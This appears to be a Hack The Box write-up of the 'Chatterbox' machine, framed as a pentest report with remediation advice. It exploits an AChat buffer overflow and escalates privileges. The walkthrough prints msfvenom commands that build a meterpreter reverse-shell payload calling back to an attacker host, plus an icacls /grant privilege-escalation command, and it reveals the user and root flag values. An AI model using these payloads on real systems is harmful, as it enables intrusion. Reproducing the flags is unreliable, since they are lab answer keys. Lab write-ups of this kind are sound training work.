HTB Walkthrough at Bottom
Key Takeaways
The version being used for AChat, the LAN chat platform, is a version that can be simply compromised using a well-known exploit (See 1.2) that allows an outside threat actor unauthorized access into a system, and then, after a simple privilege escalation by a configuration left unchecked (See 1.3), this threat actor is able to escalate privileges to access any file they want.
Objectives
Obtain the user flag by gaining any kind of remote access to the target machine/environment and extract the “user flag” string of characters, then escalate privileges, often to the “root” user or system owner to then get the “root flag,” typically only accessible by this user.
Recommendations
1.1 Nmap Scan
The target machine was susceptible to having an nmap scan run against it.
“Nmap, a key tool in penetration testing, is used to discover hosts and vulnerabilities by probing network services. The official Nmap documentation https://nmap.org/book/ outlines its methodology, involving packet transmission and response analysis. While invaluable for identifying weaknesses, Nmap scans carry risks, potentially triggering security alerts and revealing the penetration test. Balancing its significance and associated risks is crucial for a successful penetration testing strategy.”
Risk
There are multiple risks associated with allowing an nmap scan to go undetected/unprevented. It can allow a threat actor to map out the network and gain more information about the infrastructure, operating system, and other services running on the network/machine. Any information that an attacker can get from their “discovery” phase is useful to them, and limiting the publicly facing interfaces that an attacker can encounter is a good idea.
Recommendations
There are ways to prevent, or at a minimum, detect an nmap scan or other network mapping scan performed against a network (Detecting a Scan > Penetration Testing and Network Defense: Performing Host Reconnaissance | Cisco Press):
· Intrusion Detection
IDSs are similar to home security systems (burglar alarms) that monitor entry or breach into your home or office. Like the home security systems, IDSs log an alarm entry into the network. Unlike most home systems, however, you can configure an IDS to actually fight back with TCP RSTs and SHUN commands in the efforts to stop further entry or damage to the network. Location it critical with these systems, just like a standard security camera is to a security guard. That is why most IDSs are located where they can see as much traffic as possible.
· Anomaly Detection Systems
Anomaly detection systems (also called profile-based detection systems) are designed to watch user or network profiles. For example, an anomaly detection system alarms if it notices a network that normally is at 30 percent utilization peak up to 90 percent for a long period.
· Misuse Detection System
Misuse detection uses pattern matching. These systems contain a database of hundreds of patterns and signatures that are used to match with traffic on a network cable. You can compare misuse detection to standard disk antivirus software, where the antivirus software scans your hard drive looking for patterns in programs and files that represent malicious alterations. Misuse detection reads frames and packets off a cable instead of a hard drive. These are the most commonly used detection systems today. However, they can quickly become out of date as new attacks emerge that are not within the signature database.
1.2 AChat Reverse-TCP Exploit (Buffer Overflow)
“AChat client is software which allows you to connect to any Online Chat service using Windows Live ID. AChat client is the most important component of a good Live ID service. AChat client works exactly as a Desktop application. AChat client works on the basis of a central “ui” system (including channel list, room list, message board) and each instance of a Chat client connects to a unique central channel.”
This software was installed and being ran on this machine, on port 9255. This knowledge, paired with the version being displayed in my nmap scan, allowed me to look for an exploit for this particular version (AChat 0.150 Beta 7 Windows 7/8/10 x86/x64). A quick Google search showed that this version was vulnerable to a reverse-shell exploit, which in fact worked, and gave me an easy entry point to the system.
This Github page, along with this Exploit-DB page, gave me the exact payload I needed to exploit this vulnerability. By modifying certain parameters to correspond with the target IP I was given, along with changing the listening host and port to one on my local machine, I was able to launch a payload that started a reverse shell back to my local machine, giving me access as user “Alfred.”
Risk
This vulnerability holds a huge risk, as any machine running this particular version of software can be exploited and gained remote, unauthorized access to. This is a buffer overflow based exploit, and the exploit is crafted with a simple knowledge of the target’s IP address.
Recommendations
There are a few paths that can be taken here to prevent this from being exploited. The easiest of which would be to update/upgrade to a newer version of Achat that has this vulnerability patched. After searching around, this is hard to find without a license or any kind of support from the vendor from which it was purchased, as a newer open source version is not found online, and is likely not a secure download.
A better, though possibly more costly and resource-consuming, alternative would be to migrate this chat system to a different platform.
This list details 13 open-source, free alternatives for LAN messengers and local network chat clients.
If in the budget, Rocket.chat is another platform that can be utilized, as it has great reviews and a live support feature, as well as enterprise pricing plans for larger organizations (Rocket.Chat: Communications Platform You Can Fully Trust).
1.3 ICACL /grant
Once I had access as user “Alfred,” escalating privileges took about 10 minutes with the permissions this user was granted. Assuming that this was an overlooked configuration and not intentional, there are ways to patch this to defend against simple escalation of privileges by this method.
“In a cybersecurity context, the term “icacl /grant” likely refers to a command used in Microsoft Windows environments to modify or grant permissions using the iCACLS (Integrity Control Access Control List) command-line tool. The iCACLS command is used to view and manipulate discretionary access control lists (DACLs) on specified files, folders, or other objects in the Windows operating system.
Specifically, the “/grant” option is used to grant specific permissions to a user or group on a particular object. Permissions control who can access a resource and what actions they can perform on it. By using “icacl /grant,” administrators can explicitly define and modify these permissions.”
As user Alfred was shown to have read permissions of the user “Administrator’s” Desktop, we assumed that something more could be done as this user to grant permissions to gain read access to these files.
A simple one-liner granted full read-write access to any file we specified, as this command was not disabled, and was likely left in it’s default configuration.
Risk
This is a risk for the exact reason of how I utilized the vulnerability. A rogue agent with unauthorized access can grant permissions to themselves to gain read-write-execute access to files they otherwise would not be able to access, compromising the security of the overall network/machine.
Recommendations
Disabling this permission to run “icacl /grant” for unauthorized users is the best method to eliminate this vulnerability. This article outlines some steps that can be done to only allow specific /grant parameters for users on specific files/folders. This is a rather simple fix for a high-rated vulnerability.
Methodology
Enumeration
To begin, we will run an nmap scan on this box, as we typically do. This will show us what ports and services are available and running on this target machine.
nmap -sV -sC -p- 10000 10.129.235.168
From this, we can see a few different ports running.
Based on the Nmap scan results, it appears to be a Windows machine running Windows 7 Professional 7601 Service Pack 1. The hostname is identified as “CHATTERBOX,” and the system is part of the “WORKGROUP” workgroup. The open ports suggest typical services and protocols associated with Windows systems, such as Microsoft RPC, netbios-ssn, and a chat system on ports 9255 and 9256.
Of note, is the fact that guest mode is enabled on the SMB service, and message signing is disabled (as is by default).
Let’s start by looking at AChat.
“AChat client is software which allows you to connect to any Online Chat service using Windows Live ID.”
A quick Google search shows a reverse TCP shell exploit on GitHub, so let’s check that out.
GitHub — mpgn/AChat-Reverse-TCP-Exploit: Tested on AChat 0.150 Beta 7 Windows 7/8/10 x86/x64
This exploit is shown to work on Windows 7/8 and 10, and we know that this machine is running Windows 7 Professional (we know this from our nmap scan), so we have a strong guess that it will work.
AChat Reverse Shell
Let’s check out what this GitHub page says to do, and then try it out.
This looks like a standard Buffer Overflow attack, exploiting a mishandling of machine storage by overwhelming it and putting too much data in a certain payload which we will send.
Let’s try starting an instance of msfvenom to craft our payload.
Let’s clone into the HG repo on our local machine.
Following the instructions on the GH readme, we can run the sh on our local machine.
After entering our details for the payload when prompted, we then get an output to copy into our payload, which we will then copy and paste into the .py file.
We can then start the msfconsole and run our crafted payload.
In Metasploit, we will set the LHOST to our local IP, along with the LPORT to our local listening port. I will use 4444, as is used by default.
After running the listener on msfconsole and launching the payload from the GitHub repo, we are unable to get a connection. We will have to find an alternative way.
Exploit-DB Method
Fortunately, after poking around some more, we found another exploit for AChat we can try out.
AChat 0.150 beta7 — Remote Buffer Overflow — Windows remote Exploit (exploit-db.com)
The page shows a simple one-liner we can modify and run to start:
msfvenom -a x86 — platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python
We need to change this from the calc.exe to a reverse shell, as well as to include our local port and IP:
msfvenom -a x86 — platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4443 -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python
After running this, we are given a payload we can use in our buffer overflow attack.
We can copy the script into a new .py file and replace the buffer overflow payload with the one we just crafted, and from here, we can run msfconsole as we did before, as a listener.
Very important is to change the target IP in the python script to the correct one:
As I was getting problems with using msfvenom, I used a standard netcat listener to grab a connection.
After trying this a few times, we kept losing connection.
Looks like we have to use msfconsole to hold a steady connection.
We can cd .. out of wherever we are on the meterpreter to get to the root directory.
From here, we can navigate to get the user flag:
User flag: 3c40b5285669016fec7a274be7e60426
Privilege Escalation
We can find the root flag on user Administrator’s desktop, though we cannot access it.
We are able to access user Alfred’s desktop, so let’s see what else he can do.
Unfortunately, we are in a meterpreter session, and we need to be in some sort of shell to run some of these commands that we need to run, so let’s find a way to launch a shell.
To do this, all we need to do is enter command “shell.”
Let’s now run something that will show us the ACL for this user.
Icacls Desktop (from parent directory to Users\Administrator\
Interesting, we see that Alfred can read and access the Desktop for the admin user, but cannot read the root.txt file we need. Let’s see if we can somehow simply grant this permission:
We can, we simply have to run:
icacls root.txt /grant Alfred:F
Root flag: ee74988424b07a8714e4179b84eee060
Keywords
Ethical hacking case study, Penetration testing findings, HTB box analysis, Vulnerability assessment report, HTB answers, Cybersecurity testing insights, Hack The Box report, Penetration tester’s analysis, HTB challenge resolution, Ethical hacking techniques, Security assessment report, Hacker’s perspective on HTB, Network penetration testing, Exploitation and remediation, Hack The Box success story, Ethical hacking best practices, Vulnerability identification, Real-world hacking scenario, Penetration testing case study, Practical hacking lessons, htb chatterbox